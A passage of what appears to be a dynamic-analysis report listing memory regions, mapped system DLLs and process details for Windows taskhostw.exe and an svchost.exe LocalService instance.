filename = "\\Windows\\System32\\taskhostw.exe" (normalized: "c:\\windows\\system32\\taskhostw.exe")
Region:
id = 2308
start_va = 0x7ff8619c0000
end_va = 0x7ff861b80fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 2487
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 2488
start_va = 0x100000
end_va = 0x1bdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 2489
start_va = 0x430000
end_va = 0x52ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000430000"
filename = ""
Region:
id = 2490
start_va = 0x7df5ffec0000
end_va = 0x7df5fffbffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffec0000"
filename = ""
Region:
id = 2491
start_va = 0x7ff85e0e0000
end_va = 0x7ff85e2c7fff
monitored = 0
entry_point = 0x7ff85e10ba70
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 2492
start_va = 0x7ff85f160000
end_va = 0x7ff85f20cfff
monitored = 0
entry_point = 0x7ff85f1781a0
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 2493
start_va = 0x7ff85fca0000
end_va = 0x7ff85fd3cfff
monitored = 0
entry_point = 0x7ff85fca78a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 2494
start_va = 0x530000
end_va = 0x5affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000530000"
filename = ""
Region:
id = 2495
start_va = 0x7ff8616d0000
end_va = 0x7ff8617ebfff
monitored = 0
entry_point = 0x7ff8617102b0
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 2496
start_va = 0x7ff85ee20000
end_va = 0x7ff85f09cfff
monitored = 0
entry_point = 0x7ff85eef4970
region_type = mapped_file
name = "combase.dll"
filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")
Region:
id = 2497
start_va = 0x7ff85e070000
end_va = 0x7ff85e0d9fff
monitored = 0
entry_point = 0x7ff85e0a6d50
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")
Region:
id = 2498
start_va = 0x7ff85f3e0000
end_va = 0x7ff85f4a0fff
monitored = 0
entry_point = 0x7ff85f400da0
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 2499
start_va = 0x5b0000
end_va = 0x61ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000005b0000"
filename = ""
Region:
id = 2600
start_va = 0x20000
end_va = 0x26fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 2601
start_va = 0x620000
end_va = 0x762fff
monitored = 0
entry_point = 0x648210
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 2602
start_va = 0x620000
end_va = 0x6fcfff
monitored = 0
entry_point = 0x67e0b0
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 2603
start_va = 0x7ff85e060000
end_va = 0x7ff85e06efff
monitored = 0
entry_point = 0x7ff85e063210
region_type = mapped_file
name = "kernel.appcore.dll"
filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")
Region:
id = 2604
start_va = 0x7ff85f7f0000
end_va = 0x7ff85f945fff
monitored = 0
entry_point = 0x7ff85f7fa8d0
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 2605
start_va = 0x1c0000
end_va = 0x1c6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 2606
start_va = 0x7ff85f210000
end_va = 0x7ff85f395fff
monitored = 0
entry_point = 0x7ff85f25ffc0
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 2607
start_va = 0x620000
end_va = 0x7a7fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000620000"
filename = ""
Region:
id = 2608
start_va = 0x7b0000
end_va = 0x930fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000007b0000"
filename = ""
Region:
id = 2609
start_va = 0x940000
end_va = 0x9fffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000940000"
filename = ""
Region:
id = 2610
start_va = 0x1d0000
end_va = 0x1d1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001d0000"
filename = ""
Region:
id = 2611
start_va = 0x1e0000
end_va = 0x1e0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001e0000"
filename = ""
Region:
id = 2612
start_va = 0x1f0000
end_va = 0x1f0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "taskhostw.exe.mui"
filename = "\\Windows\\System32\\en-US\\taskhostw.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskhostw.exe.mui")
Region:
id = 2613
start_va = 0x400000
end_va = 0x400fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 2614
start_va = 0x410000
end_va = 0x410fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000410000"
filename = ""
Region:
id = 2690
start_va = 0x7ff85f5c0000
end_va = 0x7ff85f61afff
monitored = 0
entry_point = 0x7ff85f5d38b0
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Thread:
id = 176
os_tid = 0x478
Thread:
id = 212
os_tid = 0x5dc
Process:
id = "9"
image_name = "svchost.exe"
filename = "c:\\windows\\system32\\svchost.exe"
page_root = "0x744cc000"
os_pid = "0x3b8"
os_integrity_level = "0x4000"
os_privileges = "0x60800000"
monitor_reason = "rpc_server"
parent_id = "7"
os_parent_pid = "0x210"
cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService"
cur_dir = "C:\\Windows\\system32\\"
os_username = "NT AUTHORITY\\Local Service"
bitness = "32"
os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AJRouter" [0xa], "NT SERVICE\\bthserv" [0xa], "NT SERVICE\\CDPSvc" [0xa], "NT SERVICE\\EventSystem" [0xa], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\FontCache" [0xa], "NT SERVICE\\LicenseManager" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\PhoneSvc" [0xa], "NT SERVICE\\RemoteRegistry" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\tzautoupdate" [0xe], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT SERVICE\\workfolderssvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000cbbc" [0xc000000f], "LOCAL" [0x7]
Region:
id = 2309
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 2310
start_va = 0x20000
end_va = 0x21fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 2311
start_va = 0x30000
end_va = 0x44fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 2312
start_va = 0x50000
end_va = 0xcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 2313
start_va = 0xd0000
end_va = 0xd3fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000d0000"
filename = ""
Region:
id = 2314
start_va = 0xe0000
end_va = 0xe0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000e0000"
filename = ""
Region:
id = 2315
start_va = 0xf0000
end_va = 0xf1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 2316
start_va = 0x100000
end_va = 0x1bdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 2317
start_va = 0x1c0000
end_va = 0x1c0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001c0000"
filename = ""
Region:
id = 2318
start_va = 0x1d0000
end_va = 0x1d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001d0000"
filename = ""
Region:
id = 2319
start_va = 0x1e0000
end_va = 0x1e0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001e0000"
filename = ""
Region:
id = 2320
start_va = 0x1f0000
end_va = 0x1f0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001f0000"
filename = ""
Region:
id = 2321
start_va = 0x200000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 2322
start_va = 0x400000
end_va = 0x47ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 2323
start_va = 0x480000
end_va = 0x53ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000480000"
filename = ""
Region:
id = 2324
start_va = 0x540000
end_va = 0x540fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000540000"
filename = ""
Region:
id = 2325
start_va = 0x550000
end_va = 0x550fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000550000"
filename = ""
Region:
id = 2326
start_va = 0x590000
end_va = 0x596fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000590000"
filename = ""
Region:
id = 2327
start_va = 0x5e0000
end_va = 0x5e6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000005e0000"
filename = ""
Region:
id = 2328
start_va = 0x600000
end_va = 0x6fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000600000"
filename = ""
Region:
id = 2329
start_va = 0x700000
end_va = 0x7fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000700000"
filename = ""
Region:
id = 2330
start_va = 0x800000
end_va = 0x987fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000800000"
filename = ""
Region:
id = 2331
start_va = 0x990000
end_va = 0xb10fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000990000"
filename = ""
Region:
id = 2332
start_va = 0xb20000
end_va = 0xf1afff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000b20000"
filename = ""
Region:
id = 2333
start_va = 0x1110000
end_va = 0x1116fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001110000"
filename = ""
Region:
id = 2334
start_va = 0x1120000
end_va = 0x1168fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "~fontcache-system.dat"
filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-System.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-system.dat")
Region:
id = 2335
start_va = 0x1170000
end_va = 0x11effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001170000"
filename = ""
Region:
id = 2336
start_va = 0x1200000
end_va = 0x12fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001200000"
filename = ""
Region:
id = 2337
start_va = 0x1300000
end_va = 0x13fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001300000"
filename = ""
Region:
id = 2338
start_va = 0x1400000
end_va = 0x14fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001400000"
filename = ""
Region:
id = 2339
start_va = 0x1500000
end_va = 0x15fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001500000"
filename = ""
Region:
id = 2340
start_va = 0x1600000
end_va = 0x16fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001600000"
filename = ""
Region:
id = 2341
start_va = 0x1700000
end_va = 0x17fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001700000"
filename = ""
Region:
id = 2342
start_va = 0x1800000
end_va = 0x18fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001800000"
filename = ""
Region:
id = 2343
start_va = 0x1900000
end_va = 0x19fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001900000"
filename = ""
Region:
id = 2344
start_va = 0x1a00000
end_va = 0x29fffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "~fontcache-fontface.dat"
filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-FontFace.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-fontface.dat")
Region:
id = 2345
start_va = 0x2a00000
end_va = 0x2d36fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 2346
start_va = 0x2e00000
end_va = 0x2efffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002e00000"
filename = ""
Region:
id = 2347
start_va = 0x2f00000
end_va = 0x2ffffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002f00000"
filename = ""
Region:
id = 2348
start_va = 0x3000000
end_va = 0x30fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003000000"
filename = ""
Region:
id = 2349
start_va = 0x3200000
end_va = 0x39fffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "~fontcache-s-1-5-18.dat"
filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-S-1-5-18.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-s-1-5-18.dat")
Region:
id = 2350
start_va = 0x3a00000
end_va = 0x3afffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003a00000"
filename = ""
Region:
id = 2351
start_va = 0x3c00000
end_va = 0x3cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003c00000"
filename = ""
Region:
id = 2352
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 2353
start_va = 0x7df5ffec0000
end_va = 0x7df5fffbffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffec0000"
filename = ""
Region:
id = 2354
start_va = 0x7df5fffc0000
end_va = 0x7df5fffe2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5fffc0000"
filename = ""
Region:
id = 2355
start_va = 0x7df5ffff0000
end_va = 0x7ff5fffeffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffff0000"
filename = ""
Region:
id = 2356
start_va = 0x7ff61f760000
end_va = 0x7ff61f76cfff
monitored = 0
entry_point = 0x7ff61f763980
region_type = mapped_file
name = "svchost.exe"
filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")
Region:
id = 2357
start_va = 0x7ff856630000
end_va = 0x7ff8566bafff
monitored = 0
entry_point = 0x7ff85664d2a0
region_type = mapped_file
name = "netprofmsvc.dll"
filename = "\\Windows\\System32\\netprofmsvc.dll" (normalized: "c:\\windows\\system32\\netprofmsvc.dll")
Region:
id = 2358
start_va = 0x7ff857040000
end_va = 0x7ff85704cfff
monitored = 0
entry_point = 0x7ff857042650
region_type = mapped_file
name = "nsisvc.dll"
filename = "\\Windows\\System32\\nsisvc.dll" (normalized: "c:\\windows\\system32\\nsisvc.dll")
Region:
id = 2359
start_va = 0x7ff857840000
end_va = 0x7ff8578b9fff
monitored = 0
entry_point = 0x7ff857867630
region_type = mapped_file
name = "es.dll"
filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll")
Region:
id = 2360
start_va = 0x7ff857e20000
end_va = 0x7ff857e2bfff
monitored = 0
entry_point = 0x7ff857e214d0
region_type = mapped_file
name = "locationframeworkps.dll"
filename = "\\Windows\\System32\\LocationFrameworkPS.dll" (normalized: "c:\\windows\\system32\\locationframeworkps.dll")
Region:
id = 2361
start_va = 0x7ff858270000
end_va = 0x7ff8582b9fff
monitored = 0
entry_point = 0x7ff85827ac30
region_type = mapped_file
name = "deviceaccess.dll"
filename = "\\Windows\\System32\\deviceaccess.dll" (normalized: "c:\\windows\\system32\\deviceaccess.dll")
Region:
id = 2362
start_va = 0x7ff8582c0000
end_va = 0x7ff8582e8fff
monitored = 0
entry_point = 0x7ff8582d24d0
region_type = mapped_file
name = "fontprovider.dll"
filename = "\\Windows\\System32\\FontProvider.dll" (normalized: "c:\\windows\\system32\\fontprovider.dll")
Region:
id = 2363
start_va = 0x7ff8582f0000
end_va = 0x7ff858491fff
monitored = 0
entry_point = 0x7ff85833c2d0
region_type = mapped_file
name = "fntcache.dll"
filename = "\\Windows\\System32\\FntCache.dll" (normalized: "c:\\windows\\system32\\fntcache.dll")
Region:
id = 2364
start_va = 0x7ff858b50000
end_va = 0x7ff858b82fff
monitored = 0
entry_point = 0x7ff858b5d5a0
region_type = mapped_file
name = "biwinrt.dll"
filename = "\\Windows\\System32\\biwinrt.dll" (normalized: "c:\\windows\\system32\\biwinrt.dll")
Region:
id = 2365
start_va = 0x7ff858b90000
end_va = 0x7ff858c21fff
monitored = 0
entry_point = 0x7ff858bda780
region_type = mapped_file
name = "msvcp110_win.dll"
filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll")
Region:
id = 2366
start_va = 0x7ff858c30000
end_va = 0x7ff858ca8fff
monitored = 0
entry_point = 0x7ff858c47800
region_type = mapped_file
name = "geolocation.dll"
filename = "\\Windows\\System32\\Geolocation.dll" (normalized: "c:\\windows\\system32\\geolocation.dll")
Region:
id = 2367
start_va = 0x7ff858d70000
end_va = 0x7ff858da5fff
monitored = 0
entry_point = 0x7ff858d80070
region_type = mapped_file
name = "xmllite.dll"
filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll")
Region:
id = 2368
start_va = 0x7ff858db0000
end_va = 0x7ff858dc9fff
monitored = 0
entry_point = 0x7ff858dbb670
region_type = mapped_file
name = "tzautoupdate.dll"
filename = "\\Windows\\System32\\tzautoupdate.dll" (normalized: "c:\\windows\\system32\\tzautoupdate.dll")
Region:
id = 2369
start_va = 0x7ff858e30000
end_va = 0x7ff858e47fff
monitored = 0
entry_point = 0x7ff858e35910
region_type = mapped_file
name = "nlaapi.dll"
filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")
Region:
id = 2370
start_va = 0x7ff85cc10000
end_va = 0x7ff85cd0ffff
monitored = 0
entry_point = 0x7ff85cc50f80
region_type = mapped_file
name = "twinapi.appcore.dll"
filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll")
Region:
id = 2371
start_va = 0x7ff85d180000
end_va = 0x7ff85d273fff
monitored = 0
entry_point = 0x7ff85d18a960
region_type = mapped_file
name = "ucrtbase.dll"
filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll")
Region:
id = 2372
start_va = 0x7ff85d7a0000
end_va = 0x7ff85d7befff
monitored = 0
entry_point = 0x7ff85d7a5d30
region_type = mapped_file
name = "userenv.dll"
filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll")
Region:
id = 2373
start_va = 0x7ff85de70000
end_va = 0x7ff85de98fff
monitored = 0
entry_point = 0x7ff85de84530
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 2374
start_va = 0x7ff85e040000
end_va = 0x7ff85e053fff
monitored = 0
entry_point = 0x7ff85e0452e0
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 2375
start_va = 0x7ff85e060000
end_va = 0x7ff85e06efff
monitored = 0
entry_point = 0x7ff85e063210
region_type = mapped_file
name = "kernel.appcore.dll"
filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")
Region:
id = 2376
start_va = 0x7ff85e070000
end_va = 0x7ff85e0d9fff
monitored = 0
entry_point = 0x7ff85e0a6d50
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")
Region:
id = 2377
start_va = 0x7ff85e0e0000
end_va = 0x7ff85e2c7fff
monitored = 0
entry_point = 0x7ff85e10ba70
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 2378
start_va = 0x7ff85e410000
end_va = 0x7ff85e4c4fff
monitored = 0
entry_point = 0x7ff85e4522e0
region_type = mapped_file
name = "shcore.dll"
filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")
Region:
id = 2379
start_va = 0x7ff85ee20000
end_va = 0x7ff85f09cfff
monitored = 0
entry_point = 0x7ff85eef4970
region_type = mapped_file
name = "combase.dll"
filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")
Region:
id = 2380
start_va = 0x7ff85f0a0000
end_va = 0x7ff85f146fff
monitored = 0
entry_point = 0x7ff85f0ab4d0
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 2381
start_va = 0x7ff85f160000
end_va = 0x7ff85f20cfff
monitored = 0
entry_point = 0x7ff85f1781a0
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 2382
start_va = 0x7ff85f210000
end_va = 0x7ff85f395fff
monitored = 0
entry_point = 0x7ff85f25ffc0
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 2383
start_va = 0x7ff85f3e0000
end_va = 0x7ff85f4a0fff
monitored = 0
entry_point = 0x7ff85f400da0
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 2384
start_va = 0x7ff85f510000
end_va = 0x7ff85f5b6fff
monitored = 0
entry_point = 0x7ff85f5258d0
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 2385
start_va = 0x7ff85f5c0000
end_va = 0x7ff85f61afff
monitored = 0
entry_point = 0x7ff85f5d38b0
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 2386
start_va = 0x7ff85f7f0000
end_va = 0x7ff85f945fff
monitored = 0
entry_point = 0x7ff85f7fa8d0
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 2387
start_va = 0x7ff85f950000
end_va = 0x7ff85f957fff
monitored = 0
entry_point = 0x7ff85f951ea0
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 2388
start_va = 0x7ff85fca0000
end_va = 0x7ff85fd3cfff
monitored = 0
entry_point = 0x7ff85fca78a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 2389
start_va = 0x7ff8616d0000
end_va = 0x7ff8617ebfff
monitored = 0
entry_point = 0x7ff8617102b0
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 2390
start_va = 0x7ff8619c0000
end_va = 0x7ff861b80fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 2391
start_va = 0x3d00000
end_va = 0x3dfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003d00000"
filename = ""
Region:
id = 2395
start_va = 0x560000
end_va = 0x561fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "netprofmsvc.dll.mui"
filename = "\\Windows\\System32\\en-US\\netprofmsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netprofmsvc.dll.mui")
Region:
id = 2398
start_va = 0x3e00000
end_va = 0x3efffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003e00000"
filename = ""
Region:
id = 2399
start_va = 0x3f00000
end_va = 0x3ffffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003f00000"
filename = ""
Region:
id = 2400
start_va = 0x4000000
end_va = 0x40fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004000000"
filename = ""
Region:
id = 2401
start_va = 0x4100000
end_va = 0x41fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004100000"
filename = ""
Region:
id = 2402
start_va = 0x7ff856600000
end_va = 0x7ff85660dfff
monitored = 0
entry_point = 0x7ff856601460
region_type = mapped_file
name = "npmproxy.dll"
filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll")
Region:
id = 2411
start_va = 0x7ff85fb50000
end_va = 0x7ff85fc92fff
monitored = 0
entry_point = 0x7ff85fb78210
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 2412
start_va = 0xf20000
end_va = 0xffffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Region:
id = 2413
start_va = 0x7ff856530000
end_va = 0x7ff856543fff
monitored = 0
entry_point = 0x7ff856531a50
region_type = mapped_file
name = "wlanradiomanager.dll"
filename = "\\Windows\\System32\\WlanRadioManager.dll" (normalized: "c:\\windows\\system32\\wlanradiomanager.dll")
Region:
id = 2414
start_va = 0x7ff856ce0000
end_va = 0x7ff856d17fff
monitored = 0
entry_point = 0x7ff856cf8cc0
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 2415
start_va = 0x7ff857fb0000
end_va = 0x7ff858010fff
monitored = 0
entry_point = 0x7ff857fb4b50
region_type = mapped_file
name = "wlanapi.dll"
filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll")
Region:
id = 2416
start_va = 0x7ff8564b0000
end_va = 0x7ff8564c8fff
monitored = 0
entry_point = 0x7ff8564b2180
region_type = mapped_file
name = "bthradiomedia.dll"
filename = "\\Windows\\System32\\BthRadioMedia.dll" (normalized: "c:\\windows\\system32\\bthradiomedia.dll")
Region:
id = 2428
